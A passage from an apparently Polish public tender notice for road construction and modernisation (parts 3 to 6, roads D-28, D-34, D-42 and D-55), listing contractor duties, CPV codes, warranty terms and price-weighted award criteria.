elektroenergetycznej TAURON Dystrybucja Spółka Akcyjna z dnia 17.01.2019 r., oraz z materiałów własnych tj. wyrobów dopuszczonych do stosowania w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2021 r. poz. 2351 z późn. zm.) oraz ustawy z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. z 2021 r. poz. 1213).<br/>5) Wykonawca na przedmiot umowy udziela gwarancji na okres nie krótszy niż 36 miesięcy licząc od daty dokonania bezusterkowego odbioru końcowego przedmiotu umowy.<br/>6) Rękojmia za wady przedmiotu umowy wynosi 60 miesięcy liczonych od daty dokonania bezusterkowego odbioru końcowego przedmiotu umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45232310-8 - Roboty budowlane w zakresie linii telefonicznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia Wykonawcy, którego oferta:<br/>- odpowiada wszystkim wymaganiom przedstawionym w ustawie Pzp,<br/>- odpowiada wszystkim wymaganiom przedstawionym w SWZ,<br/>- została uznana za najkorzystniejszą w oparciu o podane kryteria wyboru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5.	Część III - budowa drogi nr D-28 o długości 27 m<br/><br/>1)	Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót, przedmiar robót, stanowiąca załącznik Nr 1 do niniejszej SWZ oraz decyzja nr 601/2019 z dnia 31 lipca 2019 r. o zatwierdzeniu projektu budowlanego i udzieleniu pozwolenia na budowę stanowiąca załącznik nr 14 do SWZ oraz Warunki techniczne przebudowy odcinków sieci gazowej Polska Spółka Gazownictwa Sp. z o.o. z dnia 26.03.2019 r. stanowiące załącznik nr 16 do SWZ <br/>2)	Wykonawca własnym staraniem i na własny koszt zobowiązany jest do:<br/>a)	odbioru placu budowy i jego zabezpieczenia;<br/>b)	urządzenia i zagospodarowania placu budowy oraz zorganizowania zaplecza budowy;<br/>c) ubezpieczenia w zakresie odpowiedzialności cywilnej z tytułu szkód, które mogą zaistnieć w trakcie realizacji przedmiotu niniejszej umowy;<br/>d)	zapewnienia własnym staraniem i na własny koszt Kierownika budowy oraz kierowników robót branżowych;<br/>e)	prowadzenia robót budowlanych z zachowaniem należytego porządku, a po ich zakończeniu do uporządkowania terenu budowy (przywrócenie go do stanu pierwotnego) i przekazania go Zamawiającemu w terminie ustalonym na odbiorze końcowym;<br/>f)	bieżącego utrzymywania porządku na miejscu objętym pracami, zapewnienia prawidłowej organizacji robót oraz wykonania robót zabezpieczających;<br/>g)	informowania Zamawiającego / Inspektora nadzoru np. poprzez wpis do dziennika budowy, o terminie wykonania/odbioru robót zanikających oraz zakrycia robót ulegających zakryciu, z wyprzedzeniem umożliwiającym ich sprawdzenie tj. 3 dni robocze. O powyższym fakcie Wykonawca niezwłocznie powiadomi Zamawiającego / Inspektora nadzoru. Przystąpienie do sprawdzenia nastąpi nie później niż w ciągu 3 dni roboczych od daty powiadomienia. Jeżeli Wykonawca nie dokonał powiadomienia, o którym mowa powyżej zobowiązany jest odkryć roboty lub wykonać inne czynności niezbędne do zbadania robót, a następnie przywrócić roboty do stanu poprzedniego na własny koszt;<br/>h)	dostarczania Zamawiającemu / Inspektorowi nadzoru bez dodatkowego wzywania wszystkich wymaganych prawem atestów, certyfikatów i specyfikacji technicznych na zastosowane materiały, pod rygorem odmowy dokonania przez Zamawiającego odbioru robót wykonanych przez Wykonawcę;<br/>i)	umożliwiania wstępu na teren budowy pracownikom Państwowego Nadzoru Budowlanego, oraz innych uprawnionych osób, do których należy wykonanie zadań określonych przepisami prawa oraz do udostępnienia im danych i informacji wymaganych prawem, a dotyczących prowadzonych na budowie robót;<br/>j)	natychmiastowego wykonania robót zabezpieczających w przypadku groźby katastrofy budowlanej lub zniszczeń oraz niezwłocznego powiadomienia o tym fakcie Zamawiającego/ Inspektora nadzoru;<br/>k)	prowadzenia robót w sposób nie powodujący uszkodzeń infrastruktury naziemnej i podziemnej oraz mienia osób trzecich, a w przypadku powstania jakiejkolwiek szkody do jej naprawienia;<br/>l)	prowadzenia na bieżąco dziennika budowy;<br/>m)	przerwania prac na żądanie Zamawiającego i w związku z tym zabezpieczenia wykonanych robót przed ich zniszczeniem;<br/>n)	zapewnienia stosownej obsługi geodezyjnej realizowanych robót budowlanych oraz do odtworzenia punktów osnowy geodezyjnej w przypadku ich zniszczenia;<br/><br/>3) Jeżeli do wykonania przedmiotu zamówienia niezbędne będzie:<br/>a) wejście w teren lub korzystanie z innych nieruchomości lub obiektów osób trzecich, Wykonawca zobowiązany jest uzyskać stosowną zgodę ich właścicieli, uzgodnić zakres i terminy korzystania z nich oraz ponieść wszystkie koszty z tym związane;<br/>b) zajęcie pasa drogowego, Wykonawca zobowiązany jest uzyskać stosowną zgodę zarządcy drogi, opracować projekt tymczasowej organizacji ruchu na czas budowy oraz ponieść wszystkie koszty z tym związane.<br/>4) Roboty budowlane stanowiące przedmiot zamówienia Wykonawca wykona zgodnie z decyzją nr 601/2019 z dnia 31 lipca 2019 r. o zatwierdzeniu projektu budowlanego i udzieleniu pozwolenia na budowę i Warunkami technicznymi przebudowy odcinków sieci gazowej Polska Spółka Gazownictwa Sp. z o.o. z dnia 26.03.2019 r. oraz z materiałów własnych tj. wyrobów dopuszczonych do stosowania w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2021 r. poz. 2351 z późn. zm.) oraz ustawy z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. z 2021 r. poz. 1213).<br/>5) Wykonawca na przedmiot umowy udziela gwarancji na okres nie krótszy niż 36 miesięcy licząc od daty dokonania bezusterkowego odbioru końcowego przedmiotu umowy.<br/>6)	Rękojmia za wady przedmiotu umowy wynosi 60 miesięcy liczonych od daty dokonania bezusterkowego odbioru końcowego przedmiotu umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45232310-8 - Roboty budowlane w zakresie linii telefonicznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia Wykonawcy, którego oferta:<br/>- odpowiada wszystkim wymaganiom przedstawionym w ustawie Pzp,<br/>- odpowiada wszystkim wymaganiom przedstawionym w SWZ,<br/>- została uznana za najkorzystniejszą w oparciu o podane kryteria wyboru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 6.	Część IV - budowa i modernizacja drogi nr D-34 (0+000-0+070) (0+070- 0+559) o długości 559 m<br/><br/>1)	Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót, przedmiar robót, stanowiąca załącznik Nr 1 do niniejszej SWZ oraz decyzja nr 601/2019 z dnia 31 lipca 2019 r. o zatwierdzeniu projektu budowlanego i udzieleniu pozwolenia na budowę stanowiąca załącznik nr 14 do SWZ oraz Warunki techniczne przebudowy odcinków sieci gazowej Polska Spółka Gazownictwa Sp. z o.o. z dnia 26.03.2019 r. stanowiące załącznik nr 16 do SWZ, <br/>2)	Wykonawca własnym staraniem i na własny koszt zobowiązany jest do:<br/>a)	odbioru placu budowy i jego zabezpieczenia;<br/>b)	urządzenia i zagospodarowania placu budowy oraz zorganizowania zaplecza budowy;<br/>c) ubezpieczenia w zakresie odpowiedzialności cywilnej z tytułu szkód, które mogą zaistnieć w trakcie realizacji przedmiotu niniejszej umowy;<br/>d)	zapewnienia własnym staraniem i na własny koszt Kierownika budowy oraz kierowników robót branżowych;<br/>e)	prowadzenia robót budowlanych z zachowaniem należytego porządku, a po ich zakończeniu do uporządkowania terenu budowy (przywrócenie go do stanu pierwotnego) i przekazania go Zamawiającemu w terminie ustalonym na odbiorze końcowym;<br/>f)	bieżącego utrzymywania porządku na miejscu objętym pracami, zapewnienia prawidłowej organizacji robót oraz wykonania robót zabezpieczających;<br/>g)	informowania Zamawiającego / Inspektora nadzoru np. poprzez wpis do dziennika budowy, o terminie wykonania/odbioru robót zanikających oraz zakrycia robót ulegających zakryciu, z wyprzedzeniem umożliwiającym ich sprawdzenie tj. 3 dni robocze. O powyższym fakcie Wykonawca niezwłocznie powiadomi Zamawiającego / Inspektora nadzoru. Przystąpienie do sprawdzenia nastąpi nie później niż w ciągu 3 dni roboczych od daty powiadomienia. Jeżeli Wykonawca nie dokonał powiadomienia, o którym mowa powyżej zobowiązany jest odkryć roboty lub wykonać inne czynności niezbędne do zbadania robót, a następnie przywrócić roboty do stanu poprzedniego na własny koszt;<br/>h)	dostarczania Zamawiającemu / Inspektorowi nadzoru bez dodatkowego wzywania wszystkich wymaganych prawem atestów, certyfikatów i specyfikacji technicznych na zastosowane materiały, pod rygorem odmowy dokonania przez Zamawiającego odbioru robót wykonanych przez Wykonawcę;<br/>i)	umożliwiania wstępu na teren budowy pracownikom Państwowego Nadzoru Budowlanego, oraz innych uprawnionych osób, do których należy wykonanie zadań określonych przepisami prawa oraz do udostępnienia im danych i informacji wymaganych prawem, a dotyczących prowadzonych na budowie robót;<br/>j)	natychmiastowego wykonania robót zabezpieczających w przypadku groźby katastrofy budowlanej lub zniszczeń oraz niezwłocznego powiadomienia o tym fakcie Zamawiającego/ Inspektora nadzoru;<br/>k)	prowadzenia robót w sposób nie powodujący uszkodzeń infrastruktury naziemnej i podziemnej oraz mienia osób trzecich, a w przypadku powstania jakiejkolwiek szkody do jej naprawienia;<br/>l)	prowadzenia na bieżąco dziennika budowy;<br/>m)	przerwania prac na żądanie Zamawiającego i w związku z tym zabezpieczenia wykonanych robót przed ich zniszczeniem;<br/>n)	zapewnienia stosownej obsługi geodezyjnej realizowanych robót budowlanych oraz do odtworzenia punktów osnowy geodezyjnej w przypadku ich zniszczenia;<br/><br/>3) Jeżeli do wykonania przedmiotu zamówienia niezbędne będzie:<br/>a) wejście w teren lub korzystanie z innych nieruchomości lub obiektów osób trzecich, Wykonawca zobowiązany jest uzyskać stosowną zgodę ich właścicieli, uzgodnić zakres i terminy korzystania z nich oraz ponieść wszystkie koszty z tym związane;<br/>b) zajęcie pasa drogowego, Wykonawca zobowiązany jest uzyskać stosowną zgodę zarządcy drogi, opracować projekt tymczasowej organizacji ruchu na czas budowy oraz ponieść wszystkie koszty z tym związane.<br/>4) Roboty budowlane stanowiące przedmiot zamówienia Wykonawca wykona zgodnie z decyzją nr 601/2019 z dnia 31 lipca 2019 r. o zatwierdzeniu projektu budowlanego i udzieleniu pozwolenia na budowę i Warunkami technicznymi przebudowy odcinków sieci gazowej Polska Spółka Gazownictwa Sp. z o.o. z dnia 26.03.2019 r., oraz z materiałów własnych tj. wyrobów dopuszczonych do stosowania w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2021 r. poz. 2351 z późn. zm.) oraz ustawy z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. z 2021 r. poz. 1213).<br/>5) Wykonawca na przedmiot umowy udziela gwarancji na okres nie krótszy niż 36 miesięcy licząc od daty dokonania bezusterkowego odbioru końcowego przedmiotu umowy.<br/>6) Rękojmia za wady przedmiotu umowy wynosi 60 miesięcy liczonych od daty dokonania bezusterkowego odbioru końcowego przedmiotu umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45232310-8 - Roboty budowlane w zakresie linii telefonicznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia Wykonawcy, którego oferta:<br/>- odpowiada wszystkim wymaganiom przedstawionym w ustawie Pzp,<br/>- odpowiada wszystkim wymaganiom przedstawionym w SWZ,<br/>- została uznana za najkorzystniejszą w oparciu o podane kryteria wyboru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 7.	Część V - budowa drogi nr D-42 o długości 335 m<br/><br/>1)	Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót, przedmiar robót, stanowiąca załącznik Nr 1 do niniejszej SWZ oraz decyzja nr 601/2019 z dnia 31 lipca 2019 r. o zatwierdzeniu projektu budowlanego i udzieleniu pozwolenia na budowę stanowiąca załącznik nr 14 do SWZ, Warunki techniczne usunięcia kolizji sieci elektroenergetycznej TAURON Dystrybucja Spółka Akcyjna z dnia 17.01.2019 r. stanowiące załącznik nr 15 do SWZ oraz Warunki techniczne przebudowy odcinków sieci gazowej Polska Spółka Gazownictwa Sp. z o.o. z dnia 26.03.2019 r. stanowiące załącznik nr 16 do SWZ, <br/>2)	Wykonawca własnym staraniem i na własny koszt zobowiązany jest do:<br/>a)	odbioru placu budowy i jego zabezpieczenia;<br/>b)	urządzenia i zagospodarowania placu budowy oraz zorganizowania zaplecza budowy;<br/>c) ubezpieczenia w zakresie odpowiedzialności cywilnej z tytułu szkód, które mogą zaistnieć w trakcie realizacji przedmiotu niniejszej umowy;<br/>d)	zapewnienia własnym staraniem i na własny koszt Kierownika budowy oraz kierowników robót branżowych;<br/>e)	prowadzenia robót budowlanych z zachowaniem należytego porządku, a po ich zakończeniu do uporządkowania terenu budowy (przywrócenie go do stanu pierwotnego) i przekazania go Zamawiającemu w terminie ustalonym na odbiorze końcowym;<br/>f)	bieżącego utrzymywania porządku na miejscu objętym pracami, zapewnienia prawidłowej organizacji robót oraz wykonania robót zabezpieczających;<br/>g)	informowania Zamawiającego / Inspektora nadzoru np. poprzez wpis do dziennika budowy, o terminie wykonania/odbioru robót zanikających oraz zakrycia robót ulegających zakryciu, z wyprzedzeniem umożliwiającym ich sprawdzenie tj. 3 dni robocze. O powyższym fakcie Wykonawca niezwłocznie powiadomi Zamawiającego / Inspektora nadzoru. Przystąpienie do sprawdzenia nastąpi nie później niż w ciągu 3 dni roboczych od daty powiadomienia. Jeżeli Wykonawca nie dokonał powiadomienia, o którym mowa powyżej zobowiązany jest odkryć roboty lub wykonać inne czynności niezbędne do zbadania robót, a następnie przywrócić roboty do stanu poprzedniego na własny koszt;<br/>h)	dostarczania Zamawiającemu / Inspektorowi nadzoru bez dodatkowego wzywania wszystkich wymaganych prawem atestów, certyfikatów i specyfikacji technicznych na zastosowane materiały, pod rygorem odmowy dokonania przez Zamawiającego odbioru robót wykonanych przez Wykonawcę;<br/>i)	umożliwiania wstępu na teren budowy pracownikom Państwowego Nadzoru Budowlanego, oraz innych uprawnionych osób, do których należy wykonanie zadań określonych przepisami prawa oraz do udostępnienia im danych i informacji wymaganych prawem, a dotyczących prowadzonych na budowie robót;<br/>j)	natychmiastowego wykonania robót zabezpieczających w przypadku groźby katastrofy budowlanej lub zniszczeń oraz niezwłocznego powiadomienia o tym fakcie Zamawiającego/ Inspektora nadzoru;<br/>k)	prowadzenia robót w sposób nie powodujący uszkodzeń infrastruktury naziemnej i podziemnej oraz mienia osób trzecich, a w przypadku powstania jakiejkolwiek szkody do jej naprawienia;<br/>l)	prowadzenia na bieżąco dziennika budowy;<br/>m)	przerwania prac na żądanie Zamawiającego i w związku z tym zabezpieczenia wykonanych robót przed ich zniszczeniem;<br/>n)	zapewnienia stosownej obsługi geodezyjnej realizowanych robót budowlanych oraz do odtworzenia punktów osnowy geodezyjnej w przypadku ich zniszczenia;<br/><br/>3) Jeżeli do wykonania przedmiotu zamówienia niezbędne będzie:<br/>a) wejście w teren lub korzystanie z innych nieruchomości lub obiektów osób trzecich, Wykonawca zobowiązany jest uzyskać stosowną zgodę ich właścicieli, uzgodnić zakres i terminy korzystania z nich oraz ponieść wszystkie koszty z tym związane;<br/>b) zajęcie pasa drogowego, Wykonawca zobowiązany jest uzyskać stosowną zgodę zarządcy drogi, opracować projekt tymczasowej organizacji ruchu na czas budowy oraz ponieść wszystkie koszty z tym związane.<br/>4) Roboty budowlane stanowiące przedmiot zamówienia Wykonawca wykona zgodnie z decyzją nr 601/2019 z dnia 31 lipca 2019 r. o zatwierdzeniu projektu budowlanego i udzieleniu pozwolenia na budowę i Warunkami technicznymi usunięcia kolizji sieci elektroenergetycznej TAURON Dystrybucja Spółka Akcyjna z dnia 17.01.2019 r., Warunkami technicznymi przebudowy odcinków sieci gazowej Polska Spółka Gazownictwa Sp. z o.o. z dnia 26.03.2019 r. oraz z materiałów własnych tj. wyrobów dopuszczonych do stosowania w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2021 r. poz. 2351 z późn. zm.) oraz ustawy z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. z 2021 r. poz. 1213).<br/>5) Wykonawca na przedmiot umowy udziela gwarancji na okres nie krótszy niż 36 miesięcy licząc od daty dokonania bezusterkowego odbioru końcowego przedmiotu umowy.<br/>6) Rękojmia za wady przedmiotu umowy wynosi 60 miesięcy liczonych od daty dokonania bezusterkowego odbioru końcowego przedmiotu umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45232310-8 - Roboty budowlane w zakresie linii telefonicznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia Wykonawcy, którego oferta:<br/>- odpowiada wszystkim wymaganiom przedstawionym w ustawie Pzp,<br/>- odpowiada wszystkim wymaganiom przedstawionym w SWZ,<br/>- została uznana za najkorzystniejszą w oparciu o podane kryteria wyboru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 8.	Część VI - modernizacja drogi nr D-55 o długości 354 m<br/>1)	Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót, przedmiar robót, stanowiąca załącznik Nr 1 do niniejszej SWZ oraz decyzja nr 601/2019 z dnia 31 lipca 2019 r. o zatwierdzeniu projektu budowlanego i udzieleniu pozwolenia na budowę stanowiąca załącznik nr 14 do SWZ, <br/>2)	Wykonawca własnym staraniem i na własny koszt zobowiązany jest do:<br/>a)	odbioru placu budowy i jego zabezpieczenia;<br/>b)	urządzenia i zagospodarowania placu budowy oraz zorganizowania zaplecza budowy;<br/>c)	ubezpieczenia w zakresie odpowiedzialności cywilnej z tytułu szkód, które mogą zaistnieć w trakcie realizacji przedmiotu niniejszej umowy;<br/>d)	zapewnienia własnym staraniem i na własny koszt Kierownika budowy oraz kierowników robót branżowych;<br/>e)	prowadzenia robót budowlanych z zachowaniem należytego porządku, a po ich zakończeniu do uporządkowania terenu budowy (przywrócenie go do stanu pierwotnego) i przekazania go Zamawiającemu w terminie ustalonym na odbiorze końcowym;<br/>f)	bieżącego utrzymywania porządku na miejscu objętym pracami, zapewnienia prawidłowej organizacji robót oraz wykonania robót zabezpieczających;<br/>g)	informowania Zamawiającego / Inspektora nadzoru np. poprzez wpis do dziennika budowy, o terminie wykonania/odbioru robót zanikających oraz zakrycia robót ulegających zakryciu, z wyprzedzeniem umożliwiającym ich sprawdzenie tj. 3 dni robocze. O powyższym fakcie Wykonawca niezwłocznie powiadomi Zamawiającego / 